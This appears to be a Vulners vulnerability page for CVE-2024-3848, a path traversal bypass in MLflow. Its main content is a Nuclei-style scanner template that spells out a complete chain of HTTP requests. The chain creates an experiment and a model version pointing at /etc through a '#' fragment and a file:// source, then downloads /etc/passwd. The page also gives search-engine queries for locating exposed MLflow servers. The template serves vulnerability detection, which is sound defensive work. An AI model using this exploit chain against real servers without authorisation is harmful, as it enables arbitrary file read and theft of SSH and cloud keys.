| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2024-3848 | 30 Nov 202413:48 | – | circl | |
| Mlflow 安全漏洞 | 16 May 202400:00 | – | cnnvd | |
| CVE-2024-3848 | 16 May 202409:03 | – | cve | |
| CVE-2024-3848 Path Traversal Bypass in mlflow/mlflow | 16 May 202409:03 | – | cvelist | |
| MLflow has a Local File Read/Path Traversal bypass | 16 May 202409:33 | – | github | |
| CVE-2024-3848 | 16 May 202409:15 | – | nvd | |
| BIT-MLFLOW-2024-3848 Path Traversal Bypass in mlflow/mlflow | 27 Jan 202507:13 | – | osv | |
| GHSA-RFQQ-WQ6W-72JM MLflow has a Local File Read/Path Traversal bypass | 16 May 202409:33 | – | osv | |
| PYSEC-2024-244 | 16 May 202409:15 | – | osv | |
| PT-2024-28025 · Mlflow · Mlflow | 16 May 202400:00 | – | ptsecurity |
id: CVE-2024-3848
info:
name: Mlflow < 2.11.0 - Path Traversal
author: gy741
severity: high
description: |
A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.12.1.
reference:
- https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610
- https://nvd.nist.gov/vuln/detail/CVE-2024-3848
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-3848
cwe-id: CWE-29
epss-score: 0.43284
epss-percentile: 0.98566
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln
variables:
random: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "artifact_location": "http://host#/../../../../../../../../../../../../../../etc/"}
- |
POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
Host: {{Hostname}}
{{random}}
- |
POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"experiment_id": "{{EXPERIMENT_ID}}"}
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}
- |
GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_7
regex:
- "root:.*:0:0:"
- type: word
part: header_7
words:
- "filename=passwd"
- "application/octet-stream"
condition: and
- type: status
status:
- 200
extractors:
- type: json
part: body_1
name: EXPERIMENT_ID
group: 1
json:
- '.experiment_id'
internal: true
- type: json
part: body_2
name: RUN_ID
group: 1
json:
- '.run.info.run_id'
internal: true
# digest: 4b0a0048304602210096fa367bacbdc7a45c3e63c4cfbbc3041e4c4eed3fa31a0f806ae586f78b47e7022100af022d4a496d71c1b542e6af6a5d756c0ae94e1bcb9a11299dc1d23c76f050de:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation